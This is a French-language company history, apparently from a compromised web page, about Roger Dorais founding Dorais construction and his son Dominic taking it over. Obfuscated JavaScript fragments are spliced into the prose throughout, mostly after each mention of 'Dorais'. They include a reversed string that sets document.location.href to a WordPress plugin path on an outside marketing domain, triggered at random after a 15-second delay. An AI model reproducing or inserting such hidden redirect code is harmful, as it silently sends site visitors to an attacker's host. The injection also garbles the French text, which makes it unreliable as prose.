Dominic Dorais

Dominic Doraisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} : Transmettre la passion de père en fils!

Au début des années 60, M. Roger Dorais (père) travaillait pour d’autres entrepreneurs en construction, notamment dans l’isolation pour graduellement débuter, avec un partenaire, sa propre entreprise et rapidement faire cavalier seul. À cette époque, il acheta des terres pour ensuite y construire des habitations. À ce temps-là M. Dorais était un acteur important dans la commandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unauté. En 1972, il incorpora Dorais construction.

Père d’une fille et de trois garçons, Sébastien, Patrice et Dominic Doraisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}, Roger Dorais a très tôt initié ses garçons aux techniques du métier. Nous avons andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toujours travaillé pour notre père et ce, durant andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toutes nos études, raconte l’actuel président de l’entreprise Dominic Doraisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}. C’était la meilleure formation qui existe et je peux en témoigner puisque, étant étudiant en gestion de la construction, à l’École de Technologie Supérieure (ETS) rien ne vaut une immersion complète sur les chantiers.

Né avec un marteau dans les mains, comme se plaît à dire Dominic Doraisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}, le jeune homme n’hésite pas à prendre de l’expérience chez d’autres compagnies, et à faire des « jobines » de soir et de fin de semaine, hisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toire de connaître ce qui se passe ailleurs et d’élargir sa vision personnelle et ses compétences professionnelles. C’est en 2002 que M. Roger Dorais doit cesser ses activités pour des raisons de santé, c’est alors que Dominic Doraisandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} cesse ses études de soir pour se consacrer entièrement à l’entreprise et poursuivre le développement suivant ainsi la philosophie transmise par son père. Aujourd’hui nous sommes fiers du tracé que notre père nous a légué.